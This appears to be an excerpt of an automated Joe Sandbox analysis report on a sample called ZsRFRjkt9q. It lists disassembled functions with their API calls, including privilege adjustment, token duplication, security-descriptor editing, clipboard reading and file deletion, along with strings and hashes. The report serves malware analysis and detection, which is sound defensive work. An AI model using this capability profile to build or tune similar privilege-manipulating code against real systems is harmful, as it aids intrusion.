Instruction ID: 1542eb62d84d10236645d43e5eed5a01f98071e92a17b919d6b928d05aac1c3f
Opcode Fuzzy Hash: 9641c01d01e40d42ee8f5cf71437ba4774e896593e718536b9572676ccf2a4f5
Instruction Fuzzy Hash: 68319871E402187BEB206F758C49FBF7F6CEB44B50F10442AFA05EA1D1D6B46D01ABA8

Function 0043ACC5 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 0043B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0043B180
Part of subcall function 0043B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0043B1AD
Part of subcall function 0043B134: GetLastError.KERNEL32 ref: 0043B1BA

_memset.LIBCMT ref: 0043AD08
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0043AD5A
CloseHandle.KERNEL32(?), ref: 0043AD6B
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0043AD82
GetProcessWindowStation.USER32 ref: 0043AD9B
SetProcessWindowStation.USER32(00000000), ref: 0043ADA5
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0043ADBF

Part of subcall function 0043AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0043ACC0), ref: 0043AB99
Part of subcall function 0043AB84: CloseHandle.KERNEL32(?,?,0043ACC0), ref: 0043ABAB

Strings

H*K, xrefs: 0043AE40
default, xrefs: 0043ADBA
winsta0, xrefs: 0043AD7D
, xrefs: 0043AD17

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $H*K$default$winsta0
API String ID: 2063423040-3138276786
Opcode ID: cc780bf8ea40b4313f64aa3df155e18326dd0ae762a0031b39a12de5993723b7
Instruction ID: f7ddd2b72f6753a7b4a817440186c9bb792b9598968c157161328d8252a4d608
Opcode Fuzzy Hash: cc780bf8ea40b4313f64aa3df155e18326dd0ae762a0031b39a12de5993723b7
Instruction Fuzzy Hash: 8581B271841209AFDF11DFA4CC45AEF7B79EF08308F04512AF964A22A1D7398E64DB69

Function 004460DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00446EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00445FA6,?), ref: 00446ED8

Part of subcall function 00446EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00445FA6,?), ref: 00446EF1

Part of subcall function 0044725E: __wsplitpath.LIBCMT ref: 0044727B
Part of subcall function 0044725E: __wsplitpath.LIBCMT ref: 0044728E

Part of subcall function 004472CB: GetFileAttributesW.KERNEL32(?,00446019), ref: 004472CC

_wcscat.LIBCMT ref: 00446149
_wcscat.LIBCMT ref: 00446167
__wsplitpath.LIBCMT ref: 0044618E
FindFirstFileW.KERNEL32(?,?), ref: 004461A4
_wcscpy.LIBCMT ref: 00446209
_wcscat.LIBCMT ref: 0044621C
_wcscat.LIBCMT ref: 0044622F
lstrcmpiW.KERNEL32(?,?), ref: 0044625D
DeleteFileW.KERNEL32(?), ref: 0044626E
MoveFileW.KERNEL32(?,?), ref: 00446289
MoveFileW.KERNEL32(?,?), ref: 00446298
CopyFileW.KERNEL32(?,?,00000000), ref: 004462AD
DeleteFileW.KERNEL32(?), ref: 004462BE
FindNextFileW.KERNEL32(00000000,00000010), ref: 004462E1
FindClose.KERNEL32(00000000), ref: 004462FD
FindClose.KERNEL32(00000000), ref: 0044630B

Strings

\*.*, xrefs: 00446138, 00446147, 00446165

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
String ID: \*.*
API String ID: 1917200108-1173974218
Opcode ID: d13f31206347c16688133b179fd0511736ac8aab39ef4f41029cc2fa49194ad5
Instruction ID: 576119141936947d833fd61f7edd2ffd4573d9f7455e634e106dfa8bb1cf487e
Opcode Fuzzy Hash: d13f31206347c16688133b179fd0511736ac8aab39ef4f41029cc2fa49194ad5
Instruction Fuzzy Hash: E8514EB290911C6ADB21FB92CC44DDF77BCBF05304F0604EBE585E2141DA7A9B498FA9

Function 00456B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0049DC00), ref: 00456B36
IsClipboardFormatAvailable.USER32(0000000D), ref: 00456B44
GetClipboardData.USER32(0000000D), ref: 00456B4C
CloseClipboard.USER32 ref: 00456B58
GlobalLock.KERNEL32(00000000), ref: 00456B74
CloseClipboard.USER32 ref: 00456B7E
GlobalUnlock.KERNEL32(00000000), ref: 00456B93
IsClipboardFormatAvailable.USER32(00000001), ref: 00456BA0
GetClipboardData.USER32(00000001), ref: 00456BA8
GlobalLock.KERNEL32(00000000), ref: 00456BB5
GlobalUnlock.KERNEL32(00000000), ref: 00456BE9
CloseClipboard.USER32 ref: 00456CF6

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 8b3f17b06824b7c20c25190885108a70b5aff585da82bc99f0ed49c0e182e786
Instruction ID: af531d0f1bbe7b8bfe1797fa9ce5f20198d32dc50305d45d4a3bf409fa3c8eaa
Opcode Fuzzy Hash: 8b3f17b06824b7c20c25190885108a70b5aff585da82bc99f0ed49c0e182e786
Instruction Fuzzy Hash: 7051A371600205ABD301AF61DC86F6F77A8AF44B15F41053EF946E72D1DF78E8098B6A

Function 0044F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0044F62B
FindClose.KERNEL32(00000000), ref: 0044F67F
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0044F6A4
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0044F6BB
FileTimeToSystemTime.KERNEL32(?,?), ref: 0044F6E2
__swprintf.LIBCMT ref: 0044F72E
__swprintf.LIBCMT ref: 0044F767
__swprintf.LIBCMT ref: 0044F7BB

Part of subcall function 0042172B: __woutput_l.LIBCMT ref: 00421784

__swprintf.LIBCMT ref: 0044F809
__swprintf.LIBCMT ref: 0044F858
__swprintf.LIBCMT ref: 0044F8A7
__swprintf.LIBCMT ref: 0044F8F6

Strings

%4d, xrefs: 0044F761
%02d, xrefs: 0044F7B0, 0044F7B9, 0044F807, 0044F856, 0044F8A5, 0044F8F4
%4d%02d%02d%02d%02d%02d, xrefs: 0044F728

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 835046349-2428617273
Opcode ID: 719a001bf592241279936c11551fac8019408ba57f3921e8acc488db3792300a
Instruction ID: e510ffb9b02b73ead12ea0b874c1ae6f3865531047a677e0e71b89571ef03704
Opcode Fuzzy Hash: 719a001bf592241279936c11551fac8019408ba57f3921e8acc488db3792300a
Instruction Fuzzy Hash: 31A122B2504344ABD310EBA5C985DAFB7ECAF98704F400D2FF585D2192EB38D949CB66

Function 00451B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00451B50
_wcscmp.LIBCMT ref: 00451B65
_wcscmp.LIBCMT ref: 00451B7C
GetFileAttributesW.KERNEL32(?), ref: 00451B8E
SetFileAttributesW.KERNEL32(?,?), ref: 00451BA8
FindNextFileW.KERNEL32(00000000,?), ref: 00451BC0
FindClose.KERNEL32(00000000), ref: 00451BCB
FindFirstFileW.KERNEL32(*.*,?), ref: 00451BE7
_wcscmp.LIBCMT ref: 00451C0E
_wcscmp.LIBCMT ref: 00451C25
SetCurrentDirectoryW.KERNEL32(?), ref: 00451C37
SetCurrentDirectoryW.KERNEL32(004B39FC), ref: 00451C55
FindNextFileW.KERNEL32(00000000,00000010), ref: 00451C5F
FindClose.KERNEL32(00000000), ref: 00451C6C
FindClose.KERNEL32(00000000), ref: 00451C7C

Strings

*.*, xrefs: 00451BE2

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 92de58b19114773358e09430fdba1132c0a7fc7ca095cb66b27fabd43ed0e6cc
Instruction ID: 6aad74260d3ea97454239cf74b6c66882def0d618beb8bb6cc3249350132f1c5
Opcode Fuzzy Hash: 92de58b19114773358e09430fdba1132c0a7fc7ca095cb66b27fabd43ed0e6cc
Instruction Fuzzy Hash: 4831D6319012196BCF11AFA19C88BDF77AC9F05321F1005ABFC11E21A1EB78DA49CB6C

Function 0046F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfilenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

DragQueryPoint.SHELL32(?,?), ref: 0046F37A

Part of subcall function 0046D7DE: ClientToScreen.USER32(?,?), ref: 0046D807
Part of subcall function 0046D7DE: GetWindowRect.USER32(?,?), ref: 0046D87D
Part of subcall function 0046D7DE: PtInRect.USER32(?,?,0046ED5A), ref: 0046D88D

SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F3EE
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F411
_wcscat.LIBCMT ref: 0046F441
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F458
SendMessageW.USER32(?,000000B0,?,?), ref: 0046F471
SendMessageW.USER32(?,000000B1,?,?), ref: 0046F488
SendMessageW.USER32(?,000000B1,?,?), ref: 0046F4AA
DragFinish.SHELL32(?), ref: 0046F4B1
NtdllDialogWndProc_W.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F59C

Strings

@GUI_DRAGID, xrefs: 0046F510
@GUI_DRAGFILE, xrefs: 0046F54B
@GUI_DROPID, xrefs: 0046F4D1

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 2166380349-3440237614
Opcode ID: f969b712b5967636f6a1032539b4ea73a817815144a0e6eb80d8ffad35820105
Instruction ID: 542b244a70a4be53351f3959c13a29a11e7469c6b76638349d2aa62145188beb
Opcode Fuzzy Hash: f969b712b5967636f6a1032539b4ea73a817815144a0e6eb80d8ffad35820105
Instruction Fuzzy Hash: 21613B71508304AFC301EF65DC85E9FBBF8EF89714F000A2EF595A21A1DB759A09CB5A

Function 00451C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00451CAB
_wcscmp.LIBCMT ref: 00451CC0
_wcscmp.LIBCMT ref: 00451CD7

Part of subcall function 00446BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00446BEF

FindNextFileW.KERNEL32(00000000,?), ref: 00451D06
FindClose.KERNEL32(00000000), ref: 00451D11
FindFirstFileW.KERNEL32(*.*,?), ref: 00451D2D
_wcscmp.LIBCMT ref: 00451D54
_wcscmp.LIBCMT ref: 00451D6B
SetCurrentDirectoryW.KERNEL32(?), ref: 00451D7D
SetCurrentDirectoryW.KERNEL32(004B39FC), ref: 00451D9B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00451DA5
FindClose.KERNEL32(00000000), ref: 00451DB2
FindClose.KERNEL32(00000000), ref: 00451DC2

Strings

*.*, xrefs: 00451D28

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 3a2c9a6aaf35be69ba26c5ff023b5ee4197996e19917fcab632a4267b80a98a0
Instruction ID: 757039d77511fdd6ae09bc12e00ada087e6453de1558d342fa786dd75baaad1d
Opcode Fuzzy Hash: 3a2c9a6aaf35be69ba26c5ff023b5ee4197996e19917fcab632a4267b80a98a0
Instruction Fuzzy Hash: 5631D3329016196ACF10AFA1DC49BDF77B89F45325F1005A7EC11A21A1DB78EA89CB6C

Function 00407D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00407DBD

Strings

], xrefs: 00407D9F
[:>:]], xrefs: 00407D37
\b(?<=\w), xrefs: 0047F877
[:<:]], xrefs: 00407D1D
\, xrefs: 0047F95B
\, xrefs: 00407D89
\b(?=\w), xrefs: 0047F85E
^, xrefs: 00407D96
Q\E, xrefs: 004086D6
[, xrefs: 00407E14
\, xrefs: 00407E1D

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: _memset
String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
API String ID: 2102423945-2023335898
Opcode ID: 0032bc026325c433b7a13fd9269aeff1e9d69cd4e0be87ad4d496eff2172935f
Instruction ID: fc21948fc6db5bd110184617dc300b4c878777a0dda4ac6c2098cdcae1b1062d
Opcode Fuzzy Hash: 0032bc026325c433b7a13fd9269aeff1e9d69cd4e0be87ad4d496eff2172935f
Instruction Fuzzy Hash: 44829D71D04219DBCB24CF98C8806EEB7B1BF44314F25816BD859BB381E778AD85CB99

Function 0045091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 004509DF
SystemTimeToFileTime.KERNEL32(?,?), ref: 004509EF
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004509FB
__wsplitpath.LIBCMT ref: 00450A59
_wcscat.LIBCMT ref: 00450A71
_wcscat.LIBCMT ref: 00450A83
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00450A98
SetCurrentDirectoryW.KERNEL32(?), ref: 00450AAC
SetCurrentDirectoryW.KERNEL32(?), ref: 00450ADE
SetCurrentDirectoryW.KERNEL32(?), ref: 00450AFF
_wcscpy.LIBCMT ref: 00450B0B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00450B4A

Strings

*.*, xrefs: 00450B05

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 2d0a0b81136769988e18dfd9554f1fc92bd9ec7e6ba6f0201e502796036e3357
Instruction ID: 10903c0e40f5f07e0d65feee08a32dd417e8c6966a873cd766c0314ba11f90b5
Opcode Fuzzy Hash: 2d0a0b81136769988e18dfd9554f1fc92bd9ec7e6ba6f0201e502796036e3357
Instruction Fuzzy Hash: E36179B65043059FD710EF61C88099EB3E8FF89314F04492EF989D3252DB39E949CB9A

Function 0046EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0046EF3B
GetFocus.USER32 ref: 0046EF4B
GetDlgCtrlID.USER32(00000000), ref: 0046EF56
_memset.LIBCMT ref: 0046F081
GetMenuItemInfoW.USER32 ref: 0046F0AC
GetMenuItemCount.USER32(00000000), ref: 0046F0CC
GetMenuItemID.USER32(?,00000000), ref: 0046F0DF
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0046F113
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0046F15B
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0046F193
NtdllDialogWndProc_W.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0046F1C8

Strings

0, xrefs: 0046F079

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
String ID: 0
API String ID: 3616455698-4108050209
Opcode ID: 9799dd3d1ee4828a97f54c740ca34035a40e28c7b9c14404954c9a3d01e4e68f
Instruction ID: fd95b6122f1952d93dd32aac1146559e7f8eb789f171782a5aa65823d75a237c
Opcode Fuzzy Hash: 9799dd3d1ee4828a97f54c740ca34035a40e28c7b9c14404954c9a3d01e4e68f
Instruction Fuzzy Hash: 87817974605301AFD710CF15D884AABBBE9FB89358F00492FF99497291E738DD09CB9A

Function 0043A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0043ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0043ABD7
Part of subcall function 0043ABBB: GetLastError.KERNEL32(?,0043A69F,?,?,?), ref: 0043ABE1
Part of subcall function 0043ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0043A69F,?,?,?), ref: 0043ABF0
Part of subcall function 0043ABBB: RtlAllocateHeap.KERNEL32(00000000,?,0043A69F,?,?,?), ref: 0043ABF7
Part of subcall function 0043ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043AC0E

Part of subcall function 0043AC56: GetProcessHeap.KERNEL32(00000008,0043A6B5,00000000,00000000,?,0043A6B5,?), ref: 0043AC62
Part of subcall function 0043AC56: RtlAllocateHeap.KERNEL32(00000000,?,0043A6B5,?), ref: 0043AC69
Part of subcall function 0043AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0043A6B5,?), ref: 0043AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0043A6D0
_memset.LIBCMT ref: 0043A6E5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0043A704
GetLengthSid.ADVAPI32(?), ref: 0043A715
GetAce.ADVAPI32(?,00000000,?), ref: 0043A752
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0043A76E
GetLengthSid.ADVAPI32(?), ref: 0043A78B
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0043A79A
RtlAllocateHeap.KERNEL32(00000000), ref: 0043A7A1
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0043A7C2
CopySid.ADVAPI32(00000000), ref: 0043A7C9
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0043A7FA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0043A820
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0043A834

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 2347767575-0
Opcode ID: 19c88d49b77f25d1d4edcb9946f7d701142184e577521806ced28fc7d34eebce
Instruction ID: 144342650f90ac67701e10cbe64f2ac991e70e4539ce56d8947383b5d4265896
Opcode Fuzzy Hash: 19c88d49b77f25d1d4edcb9946f7d701142184e577521806ced28fc7d34eebce
Instruction Fuzzy Hash: 2B516C71900209ABDF049F91DC84EEFBBB9FF09304F14812AE951AA290D739DA15CB69

Function 00406F07 Relevance: 20.9, Strings: 16, Instructions: 883COMMON

Download Yara Rule

Strings

JJJ J, xrefs: 00407096, 0040709C
ANYCRLF), xrefs: 00482E7D
ANY), xrefs: 00482E60
UCP), xrefs: 00482C8F
CR), xrefs: 00482E09
J, xrefs: 00406F77
NO_START_OPT), xrefs: 00482CD1
UTF), xrefs: 00482C7C
LIMIT_MATCH=, xrefs: 00482CF2
LF), xrefs: 00482E26
BSR_UNICODE), xrefs: 00482EBA
CRLF), xrefs: 00482E43
LIMIT_RECURSION=, xrefs: 00482D7E
BSR_ANYCRLF), xrefs: 00482EA0
UTF16), xrefs: 00482C56
NO_AUTO_POSSESS), xrefs: 00482CB0

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID:
String ID: J$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$JJJ J
API String ID: 0-2551290072
Opcode ID: 7396a4921f9da90dd1aae6694be548c28df0cce0295820056248e47a2d119cc0
Instruction ID: 487dcb99b698c5f55c49da48b78915288c7c7a08838464614983928d51956754
Opcode Fuzzy Hash: 7396a4921f9da90dd1aae6694be548c28df0cce0295820056248e47a2d119cc0
Instruction Fuzzy Hash: ED72AF71E042198BDB24DF59C8807AEB7B5FF48710F10856BE805EB381DB789E81DB99

Function 004463F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00446EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00445FA6,?), ref: 00446ED8

